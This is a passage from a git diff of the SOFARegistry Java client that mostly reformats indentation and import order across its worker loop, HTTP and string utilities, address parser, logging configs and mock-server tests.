(requestQueue.isEmpty()) { + await(config.getRecheckInterval()); + continue; } - requestQueue.putAll(events); - } - /** - * Handle. - */ - @Override - public void handle() { - //noinspection InfiniteLoopStatement - while (true) { - try { - // check connection status, try to reconnect to the server when connection lose - client.ensureConnected(); - - if (requestQueue.isEmpty()) { - await(config.getRecheckInterval()); - continue; - } - - Iterator lt = requestQueue.iterator(); - - while (lt.hasNext()) { - client.ensureConnected(); - TaskEvent ev = lt.next(); - lt.remove(); - int sendCount = ev.incSendCount(); - - // Resent needs delay when task event is not the first time to send. - if (sendCount != 0 && ev.delayTime() > 0) { - continue; - } - - handleTask(ev); - } - - // Cleaning completed task, it will take more time when the registration number is large. - requestQueue.cleanCompletedTasks(); - } catch (Throwable e) { - LOGGER.error("[send] handle data error!", e); - } - } - } + Iterator lt = requestQueue.iterator(); - private void handleTask(TaskEvent event) { - if (null == event) { - return; - } + while (lt.hasNext()) { + client.ensureConnected(); + TaskEvent ev = lt.next(); + lt.remove(); + int sendCount = ev.incSendCount(); + + // Resent needs delay when task event is not the first time to send. + if (sendCount != 0 && ev.delayTime() > 0) { + continue; + } - try { - event.setTriggerTime(System.currentTimeMillis()); - Register register = event.getSource(); - - if (!(register instanceof AbstractInternalRegister)) { - LOGGER.warn("[register] register type unknown, {}", register); - return; - } - - AbstractInternalRegister abstractInternalRegister = (AbstractInternalRegister) register; - - SyncTask syncTask = abstractInternalRegister.assemblySyncTask(); - String requestId = syncTask.getRequestId(); - - if (syncTask.isDone()) { - LOGGER.info("[register] register already sync succeeded, {}", register); - return; - } - - Object request = syncTask.getRequest(); - - Object result = client.invokeSync(request); - - if (!(result instanceof RegisterResponse)) { - LOGGER.warn("[register] result type is wrong, {}", result); - return; - } - - RegisterResponse response = (RegisterResponse) result; - if (!response.isSuccess()) { - LOGGER.info("[register] register to server failed, {}, {}", request, response); - return; - } - - boolean syncOK = abstractInternalRegister.syncOK(requestId, response.getVersion(), - response.isRefused()); - if (!syncOK) { - LOGGER.info("[register] requestId has expired, ignore this response, {}, {}, {}", - requestId, request, response); - return; - } - - if (!register.isEnabled()) { - registerCache.remove(register.getRegistId()); - } - - if (response.isRefused()) { - LOGGER.info("[register] register refused by server, {}, {}, {}", requestId, - request, response); - } else { - LOGGER.info("[register] register to server success, {}, {}, {}", requestId, - request, response); - } - } catch (Exception e) { - LOGGER.error("[send] handle request failed, {}", event, e); + handleTask(ev); } + + // Cleaning completed task, it will take more time when the registration number is large. + requestQueue.cleanCompletedTasks(); + } catch (Throwable e) { + LOGGER.error("[send] handle data error!", e); + } + } + } + + private void handleTask(TaskEvent event) { + if (null == event) { + return; } + try { + event.setTriggerTime(System.currentTimeMillis()); + Register register = event.getSource(); + + if (!(register instanceof AbstractInternalRegister)) { + LOGGER.warn("[register] register type unknown, {}", register); + return; + } + + AbstractInternalRegister abstractInternalRegister = (AbstractInternalRegister) register; + + SyncTask syncTask = abstractInternalRegister.assemblySyncTask(); + String requestId = syncTask.getRequestId(); + + if (syncTask.isDone()) { + LOGGER.info("[register] register already sync succeeded, {}", register); + return; + } + + Object request = syncTask.getRequest(); + + Object result = client.invokeSync(request); + + if (!(result instanceof RegisterResponse)) { + LOGGER.warn("[register] result type is wrong, {}", result); + return; + } + + RegisterResponse response = (RegisterResponse) result; + if (!response.isSuccess()) { + LOGGER.info("[register] register to server failed, {}, {}", request, response); + return; + } + + boolean syncOK = + abstractInternalRegister.syncOK(requestId, response.getVersion(), response.isRefused()); + if (!syncOK) { + LOGGER.info( + "[register] requestId has expired, ignore this response, {}, {}, {}", + requestId, + request, + response); + return; + } + + if (!register.isEnabled()) { + registerCache.remove(register.getRegistId()); + } + + if (response.isRefused()) { + LOGGER.info( + "[register] register refused by server, {}, {}, {}", requestId, request, response); + } else { + LOGGER.info( + "[register] register to server success, {}, {}, {}", requestId, request, response); + } + } catch (Exception e) { + LOGGER.error("[send] handle request failed, {}", event, e); + } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/CommonUtils.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/CommonUtils.java index f2fd2ecbe..ab5a14388 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/CommonUtils.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/CommonUtils.java @@ -20,18 +20,19 @@ /** * The type Common utils. + * * @author zhuoyu.sjw * @version $Id : CommonUtils.java, v 0.1 2018-07-15 22:48 zhuoyu.sjw Exp $$ */ public class CommonUtils { - /** - * Is not empty boolean. - * - * @param collection the collection - * @return the boolean - */ - public static boolean isNotEmpty(Collection collection) { - return collection != null && !collection.isEmpty(); - } + /** + * Is not empty boolean. + * + * @param collection the collection + * @return the boolean + */ + public static boolean isNotEmpty(Collection collection) { + return collection != null && !collection.isEmpty(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/HttpClientUtils.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/HttpClientUtils.java index 2415ea560..8643c91a6 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/HttpClientUtils.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/HttpClientUtils.java @@ -17,7 +17,6 @@ package com.alipay.sofa.registry.client.util; import com.alipay.sofa.registry.client.api.RegistryClientConfig; - import java.io.BufferedReader; import java.io.InputStreamReader; import java.net.HttpURLConnection; @@ -28,97 +27,97 @@ /** * The type Http client utils. + * * @author zhuoyu.sjw * @version $Id : HttpClientUtils.java, v 0.1 2018-03-22 17:38 zhuoyu.sjw Exp $$ */ public class HttpClientUtils { - private static final char AND = '&'; + private static final char AND = '&'; - /** - * Get string. - * - * @param url the url - * @param params the params - * @param config the config - * @return the string - * @throws Exception the exception - */ - public static String get(String url, Map params, RegistryClientConfig config) - throws Exception { - HttpURLConnection httpURLConnection = create(getFullPath(url, params), config); - httpURLConnection.setRequestMethod("GET"); + /** + * Get string. + * + * @param url the url + * @param params the params + * @param config the config + * @return the string + * @throws Exception the exception + */ + public static String get(String url, Map params, RegistryClientConfig config) + throws Exception { + HttpURLConnection httpURLConnection = create(getFullPath(url, params), config); + httpURLConnection.setRequestMethod("GET"); - BufferedReader reader = null; - try { - StringBuilder stringBuffer = new StringBuilder(); + BufferedReader reader = null; + try { + StringBuilder stringBuffer = new StringBuilder(); - int responseCode = httpURLConnection.getResponseCode(); - if (responseCode == HttpURLConnection.HTTP_OK) { - String charset = httpURLConnection.getContentEncoding(); - if (charset != null) { - reader = new BufferedReader(new InputStreamReader( - httpURLConnection.getInputStream(), charset)); - } else { - reader = new BufferedReader(new InputStreamReader( - httpURLConnection.getInputStream())); - } - - String strCurrentLine; - while ((strCurrentLine = reader.readLine()) != null) { - stringBuffer.append(strCurrentLine).append("\n"); - } - if (stringBuffer.length() > 0 - && stringBuffer.charAt(stringBuffer.length() - 1) == '\n') { - stringBuffer.deleteCharAt(stringBuffer.length() - 1); - } + int responseCode = httpURLConnection.getResponseCode(); + if (responseCode == HttpURLConnection.HTTP_OK) { + String charset = httpURLConnection.getContentEncoding(); + if (charset != null) { + reader = + new BufferedReader( + new InputStreamReader(httpURLConnection.getInputStream(), charset)); + } else { + reader = new BufferedReader(new InputStreamReader(httpURLConnection.getInputStream())); + } - return stringBuffer.toString(); - } - } finally { - httpURLConnection.disconnect(); - if (null != reader) { - reader.close(); - } + String strCurrentLine; + while ((strCurrentLine = reader.readLine()) != null) { + stringBuffer.append(strCurrentLine).append("\n"); + } + if (stringBuffer.length() > 0 && stringBuffer.charAt(stringBuffer.length() - 1) == '\n') { + stringBuffer.deleteCharAt(stringBuffer.length() - 1); } - return null; - } - /** - * Create http url connection. - * - * @param httpUrl the http url - * @param config the config - * @return the http url connection - * @throws Exception the exception - */ - private static HttpURLConnection create(String httpUrl, RegistryClientConfig config) - throws Exception { - URL url = new URL(httpUrl); - URLConnection urlConnection = url.openConnection(); - HttpURLConnection httpConnection = (HttpURLConnection) urlConnection; - httpConnection.setDoOutput(true); - httpConnection.setDoInput(true); - httpConnection.setUseCaches(false); - httpConnection.setRequestProperty("Content-type", "text/plain"); - httpConnection.setConnectTimeout(config.getConnectTimeout()); - httpConnection.setReadTimeout(config.getSocketTimeout()); - return httpConnection; + return stringBuffer.toString(); + } + } finally { + httpURLConnection.disconnect(); + if (null != reader) { + reader.close(); + } } + return null; + } - private static String getFullPath(String url, Map params) { - StringBuilder sb = new StringBuilder(url); - if (params != null) { - sb.append("?"); - for (Entry param : params.entrySet()) { - sb.append(param.getKey()); - sb.append("="); - sb.append(param.getValue()); - sb.append("&"); - } - if (sb.charAt(sb.length() - 1) == AND) { - sb.deleteCharAt(sb.length() - 1); - } - } - return sb.toString(); + /** + * Create http url connection. + * + * @param httpUrl the http url + * @param config the config + * @return the http url connection + * @throws Exception the exception + */ + private static HttpURLConnection create(String httpUrl, RegistryClientConfig config) + throws Exception { + URL url = new URL(httpUrl); + URLConnection urlConnection = url.openConnection(); + HttpURLConnection httpConnection = (HttpURLConnection) urlConnection; + httpConnection.setDoOutput(true); + httpConnection.setDoInput(true); + httpConnection.setUseCaches(false); + httpConnection.setRequestProperty("Content-type", "text/plain"); + httpConnection.setConnectTimeout(config.getConnectTimeout()); + httpConnection.setReadTimeout(config.getSocketTimeout()); + return httpConnection; + } + + private static String getFullPath(String url, Map params) { + StringBuilder sb = new StringBuilder(url); + if (params != null) { + sb.append("?"); + for (Entry param : params.entrySet()) { + sb.append(param.getKey()); + sb.append("="); + sb.append(param.getValue()); + sb.append("&"); + } + if (sb.charAt(sb.length() - 1) == AND) { + sb.deleteCharAt(sb.length() - 1); + } } + return sb.toString(); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/ServerNodeParser.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/ServerNodeParser.java index da8b41f77..a776805b0 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/ServerNodeParser.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/ServerNodeParser.java @@ -18,123 +18,117 @@ import com.alipay.sofa.registry.client.provider.DefaultServerNode; import com.alipay.sofa.registry.client.remoting.ServerNode; - import java.util.Properties; /** - * * @author zhuoyu.sjw * @version $Id: ServerNodeParser.java, v 0.1 2018-03-22 20:28 zhuoyu.sjw Exp $$ */ public class ServerNodeParser { - /** symbol : */ - private static final char COLON = ':'; + /** symbol : */ + private static final char COLON = ':'; - /** symbol = */ - private static final char EQUAL = '='; + /** symbol = */ + private static final char EQUAL = '='; - /** symbol & */ - private static final char AND = '&'; + /** symbol & */ + private static final char AND = '&'; - /** symbol ? */ - private static final char QUES = '?'; + /** symbol ? */ + private static final char QUES = '?'; + + /** @see com.alipay.remoting.RemotingAddressParser#parse(String) */ + @SuppressWarnings("ConstantConditions") + public static ServerNode parse(String url) { + if (StringUtils.isBlank(url)) { + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], should not be blank! "); + } + String ip = null; + String port = null; + Properties properties = null; - /** - * @see com.alipay.remoting.RemotingAddressParser#parse(String) - */ - @SuppressWarnings("ConstantConditions") - public static ServerNode parse(String url) { - if (StringUtils.isBlank(url)) { - throw new IllegalArgumentException("Illegal format address string [" + url - + "], should not be blank! "); + int size = url.length(); + int pos = 0; + for (int i = 0; i < size; ++i) { + if (COLON == url.charAt(i)) { + ip = url.substring(pos, i); + pos = i; + // should not end with COLON + if (i == size - 1) { + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], should not end with COLON[:]! "); } - String ip = null; - String port = null; - Properties properties = null; + break; + } + // must have one COLON + if (i == size - 1) { + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], must have one COLON[:]! "); + } + } - int size = url.length(); - int pos = 0; - for (int i = 0; i < size; ++i) { - if (COLON == url.charAt(i)) { - ip = url.substring(pos, i); - pos = i; - // should not end with COLON - if (i == size - 1) { - throw new IllegalArgumentException("Illegal format address string [" + url - + "], should not end with COLON[:]! "); - } - break; - } - // must have one COLON - if (i == size - 1) { - throw new IllegalArgumentException("Illegal format address string [" + url - + "], must have one COLON[:]! "); - } + for (int i = pos; i < size; ++i) { + if (QUES == url.charAt(i)) { + port = url.substring(pos + 1, i); + pos = i; + if (i == size - 1) { + // should not end with QUES + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], should not end with QUES[?]! "); } + break; + } + // end without a QUES + if (i == size - 1) { + port = url.substring(pos + 1, i + 1); + pos = size; + } + } + if (pos < (size - 1)) { + properties = new Properties(); + while (pos < (size - 1)) { + String key = null; + String value = null; for (int i = pos; i < size; ++i) { - if (QUES == url.charAt(i)) { - port = url.substring(pos + 1, i); - pos = i; - if (i == size - 1) { - // should not end with QUES - throw new IllegalArgumentException("Illegal format address string [" + url - + "], should not end with QUES[?]! "); - } - break; - } - // end without a QUES + if (EQUAL == url.charAt(i)) { + key = url.substring(pos + 1, i); + pos = i; if (i == size - 1) { - port = url.substring(pos + 1, i + 1); - pos = size; + // should not end with EQUAL + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], should not end with EQUAL[=]! "); } + break; + } + if (i == size - 1) { + // must have one EQUAL + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], must have one EQUAL[=]! "); + } } - - if (pos < (size - 1)) { - properties = new Properties(); - while (pos < (size - 1)) { - String key = null; - String value = null; - for (int i = pos; i < size; ++i) { - if (EQUAL == url.charAt(i)) { - key = url.substring(pos + 1, i); - pos = i; - if (i == size - 1) { - // should not end with EQUAL - throw new IllegalArgumentException( - "Illegal format address string [" + url - + "], should not end with EQUAL[=]! "); - } - break; - } - if (i == size - 1) { - // must have one EQUAL - throw new IllegalArgumentException("Illegal format address string [" + url - + "], must have one EQUAL[=]! "); - } - } - for (int i = pos; i < size; ++i) { - if (AND == url.charAt(i)) { - value = url.substring(pos + 1, i); - pos = i; - if (i == size - 1) { - // should not end with AND - throw new IllegalArgumentException("Illegal format address string [" - + url - + "], should not end with AND[&]! "); - } - break; - } - // end without more AND - if (i == size - 1) { - value = url.substring(pos + 1, i + 1); - pos = size; - } - } - properties.put(key, value); + for (int i = pos; i < size; ++i) { + if (AND == url.charAt(i)) { + value = url.substring(pos + 1, i); + pos = i; + if (i == size - 1) { + // should not end with AND + throw new IllegalArgumentException( + "Illegal format address string [" + url + "], should not end with AND[&]! "); } + break; + } + // end without more AND + if (i == size - 1) { + value = url.substring(pos + 1, i + 1); + pos = size; + } } - return new DefaultServerNode(url, ip, Integer.parseInt(port), properties); + properties.put(key, value); + } } + return new DefaultServerNode(url, ip, Integer.parseInt(port), properties); + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/StringUtils.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/StringUtils.java index 63e4f3773..4a5024c9c 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/util/StringUtils.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/util/StringUtils.java @@ -18,101 +18,99 @@ /** * The type String utils. + * * @author zhuoyu.sjw * @version $Id : StringUtils.java, v 0.1 2018-03-05 17:36 zhuoyu.sjw Exp $$ */ public class StringUtils { - /** - * The constant EMPTY. - */ - public static final String EMPTY = ""; + /** The constant EMPTY. */ + public static final String EMPTY = ""; - /** - * Is empty boolean. - * - * @param cs the cs - * @return the boolean - */ - public static boolean isEmpty(CharSequence cs) { - return cs == null || cs.length() == 0; - } + /** + * Is empty boolean. + * + * @param cs the cs + * @return the boolean + */ + public static boolean isEmpty(CharSequence cs) { + return cs == null || cs.length() == 0; + } - /** - * Is not empty boolean. - * - * @param cs the cs - * @return the boolean - */ - public static boolean isNotEmpty(CharSequence cs) { - return !isEmpty(cs); - } + /** + * Is not empty boolean. + * + * @param cs the cs + * @return the boolean + */ + public static boolean isNotEmpty(CharSequence cs) { + return !isEmpty(cs); + } - /** - * Is blank boolean. - * - * @param cs the cs - * @return the boolean - */ - public static boolean isBlank(CharSequence cs) { - int strLen; - if (cs == null || (strLen = cs.length()) == 0) { - return true; - } - for (int i = 0; i < strLen; i++) { - if (!Character.isWhitespace(cs.charAt(i))) { - return false; - } - } - return true; + /** + * Is blank boolean. + * + * @param cs the cs + * @return the boolean + */ + public static boolean isBlank(CharSequence cs) { + int strLen; + if (cs == null || (strLen = cs.length()) == 0) { + return true; } - - /** - * Is not blank boolean. - * - * @param cs the cs - * @return the boolean - */ - public static boolean isNotBlank(CharSequence cs) { - return !isBlank(cs); + for (int i = 0; i < strLen; i++) { + if (!Character.isWhitespace(cs.charAt(i))) { + return false; + } } + return true; + } - /** - *

Returns either the passed in String, - * or if the String is {@code null}, an empty String ("").

- * - *
-     * StringUtils.defaultString(null)  = ""
-     * StringUtils.defaultString("")    = ""
-     * StringUtils.defaultString("bat") = "bat"
-     * 
- * - * @param str the String to check, may be null - * @return the passed in String, or the empty String if it was {@code null} - * @see String#valueOf(Object) String#valueOf(Object) - */ - public static String defaultString(final Object str) { - return toString(str, EMPTY); - } + /** + * Is not blank boolean. + * + * @param cs the cs + * @return the boolean + */ + public static boolean isNotBlank(CharSequence cs) { + return !isBlank(cs); + } - /** - * To string string. - * - * @param o the o - * @param defaultVal the default val - * @return the string - */ - public static String toString(Object o, String defaultVal) { - return o == null ? defaultVal : o.toString(); - } + /** + * Returns either the passed in String, or if the String is {@code null}, an empty String (""). + * + *
+   * StringUtils.defaultString(null)  = ""
+   * StringUtils.defaultString("")    = ""
+   * StringUtils.defaultString("bat") = "bat"
+   * 
+ * + * @param str the String to check, may be null + * @return the passed in String, or the empty String if it was {@code null} + * @see String#valueOf(Object) String#valueOf(Object) + */ + public static String defaultString(final Object str) { + return toString(str, EMPTY); + } - /** - * To string string. - * - * @param o the o - * @return the string - */ - public static String toString(Object o) { - return toString(o, null); - } + /** + * To string string. + * + * @param o the o + * @param defaultVal the default val + * @return the string + */ + public static String toString(Object o, String defaultVal) { + return o == null ? defaultVal : o.toString(); + } + + /** + * To string string. + * + * @param o the o + * @return the string + */ + public static String toString(Object o) { + return toString(o, null); + } } diff --git a/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/log4j/log-conf.xml b/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/log4j/log-conf.xml index cbd2e0d00..e5899cbbc 100644 --- a/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/log4j/log-conf.xml +++ b/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/log4j/log-conf.xml @@ -6,55 +6,55 @@ - - - - - + + + + + - + - - - - - + + + + + - + - - + + - - - - - + + + + + - + - - + + - + - + diff --git a/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/logback/log-conf.xml b/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/logback/log-conf.xml index 3ec6052ab..fd1f5fcd7 100644 --- a/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/logback/log-conf.xml +++ b/client/impl/src/main/resources/com/alipay/sofa/registry/client/log/logback/log-conf.xml @@ -2,9 +2,9 @@ - - - + + + diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/MockServer.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/MockServer.java index 4e941f2aa..d2a76dd19 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/MockServer.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/MockServer.java @@ -27,198 +27,189 @@ import com.alipay.sofa.registry.core.model.RegisterResponse; import com.alipay.sofa.registry.core.model.Result; import com.alipay.sofa.registry.core.model.SubscriberRegister; -import org.slf4j.Logger; -import org.slf4j.LoggerFactory; - import java.util.HashMap; import java.util.List; import java.util.Map; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; /** * The type Mock server. + * * @author zhuoyu.sjw * @version $Id : MockServer.java, v 0.1 2017-12-25 22:39 zhuoyu.sjw Exp $$ */ public class MockServer { - /** LOGGER */ - private static final Logger LOGGER = LoggerFactory - .getLogger(MockServer.class); - - private RpcServer rpcServer; - - private String ip = "127.0.0.1"; - - private int port = 9600; - - private Map publisherMap = new HashMap(); - private Map subscriberMap = new HashMap(); - private Map configuratorMap = new HashMap(); - - /** - * Start. - */ - public void start() { - rpcServer = new RpcServer(port); - rpcServer.registerUserProcessor(new MockSubscriberRegisterProcessor()); - rpcServer.registerUserProcessor(new MockPublisherRegisterProcessor()); - rpcServer.registerUserProcessor(new MockConfiguratorRegisterProcesor()); - rpcServer.start(ip); + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(MockServer.class); + + private RpcServer rpcServer; + + private String ip = "127.0.0.1"; + + private int port = 9600; + + private Map publisherMap = new HashMap(); + private Map subscriberMap = new HashMap(); + private Map configuratorMap = + new HashMap(); + + /** Start. */ + public void start() { + rpcServer = new RpcServer(port); + rpcServer.registerUserProcessor(new MockSubscriberRegisterProcessor()); + rpcServer.registerUserProcessor(new MockPublisherRegisterProcessor()); + rpcServer.registerUserProcessor(new MockConfiguratorRegisterProcesor()); + rpcServer.start(); + } + + /** Stop. */ + public void stop() { + rpcServer.stop(); + } + + /** + * Getter method for property ip. + * + * @return property value of ip + */ + public String getIp() { + return ip; + } + + /** + * Setter method for property ip. + * + * @param ip value to be assigned to property ip + */ + public void setIp(String ip) { + this.ip = ip; + } + + /** + * Getter method for property port. + * + * @return property value of port + */ + public int getPort() { + return port; + } + + /** + * Setter method for property port. + * + * @param port value to be assigned to property port + */ + public void setPort(int port) { + this.port = port; + } + + /** + * Query publisher by registId + * + * @param registId + * @return + */ + public PublisherRegister queryPubliser(String registId) { + return publisherMap.get(registId); + } + + /** + * Query subscriber by registId + * + * @param registId + * @return + */ + public SubscriberRegister querySubscriber(String registId) { + return subscriberMap.get(registId); + } + + /** The type Mock subscriber register processor. */ + class MockSubscriberRegisterProcessor extends SyncUserProcessor { + + @Override + public Object handleRequest(BizContext bizCtx, SubscriberRegister request) throws Exception { + if ("subscribeAndRefused".equals(request.getDataId())) { + return response(request, true); + } + + Result result = new Result(); + result.setSuccess(true); + String registId = request.getRegistId(); + if (EventTypeConstants.REGISTER.equals(request.getEventType())) { + subscriberMap.put(registId, request); + } else if (EventTypeConstants.UNREGISTER.equals(request.getEventType())) { + subscriberMap.remove(registId); + } + return response(request); } - /** - * Stop. - */ - public void stop() { - rpcServer.stop(); + @Override + public String interest() { + return SubscriberRegister.class.getName(); } - - /** - * Getter method for property ip. - * - * @return property value of ip - */ - public String getIp() { - return ip; - } - - /** - * Setter method for property ip. - * - * @param ip value to be assigned to property ip - */ - public void setIp(String ip) { - this.ip = ip; + } + + /** The type Mock publisher register processor. */ + class MockPublisherRegisterProcessor extends SyncUserProcessor { + + @Override + public Object handleRequest(BizContext bizCtx, PublisherRegister request) throws Exception { + if ("publishAndRefused".equals(request.getDataId())) { + return response(request, true); + } + String registId = request.getRegistId(); + List dataList = request.getDataList(); + LOGGER.info(registId + " " + request.getEventType() + " " + dataList); + if (EventTypeConstants.REGISTER.equals(request.getEventType())) { + publisherMap.put(registId, request); + } else if (EventTypeConstants.UNREGISTER.equals(request.getEventType())) { + publisherMap.remove(registId); + } + return response(request); } - /** - * Getter method for property port. - * - * @return property value of port - */ - public int getPort() { - return port; + @Override + public String interest() { + return PublisherRegister.class.getName(); } - - /** - * Setter method for property port. - * - * @param port value to be assigned to property port - */ - public void setPort(int port) { - this.port = port; - } - - /** - * Query publisher by registId - * - * @param registId - * @return - */ - public PublisherRegister queryPubliser(String registId) { - return publisherMap.get(registId); - } - - /** - * Query subscriber by registId - * - * @param registId - * @return - */ - public SubscriberRegister querySubscriber(String registId) { - return subscriberMap.get(registId); - } - - /** - * The type Mock subscriber register processor. - */ - class MockSubscriberRegisterProcessor extends SyncUserProcessor { - - @Override - public Object handleRequest(BizContext bizCtx, SubscriberRegister request) throws Exception { - if ("subscribeAndRefused".equals(request.getDataId())) { - return response(request, true); - } - - Result result = new Result(); - result.setSuccess(true); - String registId = request.getRegistId(); - if (EventTypeConstants.REGISTER.equals(request.getEventType())) { - subscriberMap.put(registId, request); - } else if (EventTypeConstants.UNREGISTER.equals(request.getEventType())) { - subscriberMap.remove(registId); - } - return response(request); - } - - @Override - public String interest() { - return SubscriberRegister.class.getName(); - } - } - - /** - * The type Mock publisher register processor. - */ - class MockPublisherRegisterProcessor extends SyncUserProcessor { - - @Override - public Object handleRequest(BizContext bizCtx, PublisherRegister request) throws Exception { - if ("publishAndRefused".equals(request.getDataId())) { - return response(request, true); - } - String registId = request.getRegistId(); - List dataList = request.getDataList(); - LOGGER.info(registId + " " + request.getEventType() + " " + dataList); - if (EventTypeConstants.REGISTER.equals(request.getEventType())) { - publisherMap.put(registId, request); - } else if (EventTypeConstants.UNREGISTER.equals(request.getEventType())) { - publisherMap.remove(registId); - } - return response(request); - } - - @Override - public String interest() { - return PublisherRegister.class.getName(); - } - } - - private RegisterResponse response(BaseRegister register) { - return response(register, false); - } - - private RegisterResponse response(BaseRegister register, boolean refused) { - RegisterResponse response = new RegisterResponse(); - response.setSuccess(true); - response.setVersion(register.getVersion()); - response.setRegistId(register.getRegistId()); - response.setRefused(refused); - return response; + } + + private RegisterResponse response(BaseRegister register) { + return response(register, false); + } + + private RegisterResponse response(BaseRegister register, boolean refused) { + RegisterResponse response = new RegisterResponse(); + response.setSuccess(true); + response.setVersion(register.getVersion()); + response.setRegistId(register.getRegistId()); + response.setRefused(refused); + return response; + } + + class MockConfiguratorRegisterProcesor extends SyncUserProcessor { + + @Override + public Object handleRequest(BizContext bizCtx, ConfiguratorRegister request) throws Exception { + if ("subscribeAndRefused".equals(request.getDataId())) { + return response(request, true); + } + + String registId = request.getRegistId(); + LOGGER.info("dataId: {} registId: {}", request.getDataId(), registId); + if (EventTypeConstants.REGISTER.equals(request.getEventType())) { + configuratorMap.put(registId, request); + } else if (EventTypeConstants.UNREGISTER.equals(request.getEventType())) { + configuratorMap.remove(registId); + } + return response(request); } - class MockConfiguratorRegisterProcesor extends SyncUserProcessor { - - @Override - public Object handleRequest(BizContext bizCtx, ConfiguratorRegister request) - throws Exception { - if ("subscribeAndRefused".equals(request.getDataId())) { - return response(request, true); - } - - String registId = request.getRegistId(); - LOGGER.info("dataId: {} registId: {}", request.getDataId(), registId); - if (EventTypeConstants.REGISTER.equals(request.getEventType())) { - configuratorMap.put(registId, request); - } else if (EventTypeConstants.UNREGISTER.equals(request.getEventType())) { - configuratorMap.remove(registId); - } - return response(request); - } - - @Override - public String interest() { - return ConfiguratorRegister.class.getName(); - } + @Override + public String interest() { + return ConfiguratorRegister.class.getName(); } + } } diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/base/BaseTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/base/BaseTest.java index c32d42500..7bc4d846b 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/base/BaseTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/base/BaseTest.java @@ -16,6 +16,11 @@ */ package com.alipay.sofa.registry.client.base; +import static org.mockito.Matchers.any; +import static org.mockito.Matchers.anyMapOf; +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.when; + import com.alipay.sofa.registry.client.MockServer; import com.alipay.sofa.registry.client.api.RegistryClientConfig; import com.alipay.sofa.registry.client.provider.DefaultRegistryClient; @@ -28,13 +33,7 @@ import org.powermock.core.classloader.annotations.PrepareForTest; import org.powermock.modules.junit4.PowerMockRunner; -import static org.mockito.Matchers.any; -import static org.mockito.Matchers.anyMapOf; -import static org.mockito.Matchers.anyString; -import static org.mockito.Mockito.when; - /** - * * @author zhuoyu.sjw * @version $Id: BaseTest.java, v 0.1 2018-03-24 14:58 zhuoyu.sjw Exp $$ */ @@ -42,31 +41,34 @@ @PrepareForTest(HttpClientUtils.class) public abstract class BaseTest { - protected DefaultRegistryClient registryClient; + protected DefaultRegistryClient registryClient; - protected String appName = "registry-test"; + protected String appName = "registry-test"; - protected String dataCenter = "HZ"; + protected String dataCenter = "HZ"; - protected String instanceId = "testInstanceId"; + protected String instanceId = "testInstanceId"; - protected MockServer mockServer; + protected MockServer mockServer; - @Before - public void setUp() throws Exception { - mockServer = new MockServer(); - mockServer.start(); + @Before + public void setUp() throws Exception { + mockServer = new MockServer(); + mockServer.start(); - PowerMockito.mockStatic(HttpClientUtils.class); - when( - HttpClientUtils.get(anyString(), anyMapOf(String.class, String.class), - any(RegistryClientConfig.class))).thenReturn( - mockServer.getIp() + ":" + mockServer.getPort()); + PowerMockito.mockStatic(HttpClientUtils.class); + when(HttpClientUtils.get( + anyString(), anyMapOf(String.class, String.class), any(RegistryClientConfig.class))) + .thenReturn(mockServer.getIp() + ":" + mockServer.getPort()); - DefaultRegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setAppName(appName).setDataCenter(dataCenter).setInstanceId(instanceId) - .setRegistryEndpoint(mockServer.getIp()).build(); - registryClient = new DefaultRegistryClient(config); - registryClient.init(); - } + DefaultRegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start() + .setAppName(appName) + .setDataCenter(dataCenter) + .setInstanceId(instanceId) + .setRegistryEndpoint(mockServer.getIp()) + .build(); + registryClient = new DefaultRegistryClient(config); + registryClient.init(); + } } diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/DefaultEventBusTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/DefaultEventBusTest.java index 794f0751f..676b08334 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/event/DefaultEventBusTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/event/DefaultEventBusTest.java @@ -16,75 +16,74 @@ */ package com.alipay.sofa.registry.client.event; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertFalse; +import static org.junit.Assert.assertTrue; + import com.alipay.sofa.registry.client.api.RegistryClientConfig; import 